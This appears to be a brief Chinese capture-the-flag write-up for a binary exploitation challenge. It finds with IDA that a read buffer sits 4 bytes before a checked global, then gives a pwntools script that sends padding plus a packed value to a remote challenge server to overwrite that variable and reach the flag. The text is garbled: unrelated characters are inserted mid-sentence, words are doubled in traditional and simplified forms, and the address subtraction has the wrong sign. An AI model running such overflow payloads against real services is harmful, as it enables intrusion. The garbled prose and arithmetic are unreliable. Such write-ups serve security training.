checksec然后試運行
放入64位ida,看看main函數(shù)
點擊read函數(shù)里的unk_601068,再點擊if函數(shù)里的dword_60106C传透,發(fā)現(xiàn)他們只相差了0x601068-0x60106c=0x4凄敢,再點擊sub_400686(),發(fā)現(xiàn)了拿到flag的地方
現(xiàn)在就很明朗了庸追,用read函數(shù)棧溢出覆蓋地址
點擊h把int轉(zhuǎn)成16進制
寫腳本
#coding=utf8
from pwn import *
context.log_level = 'debug'
p = remote('111.198.29.45',37550)
payload = ''
payload += 0x4*'A'
payload += p64(0x6E756161)
p.sendline(payload)
p.interactive()
成功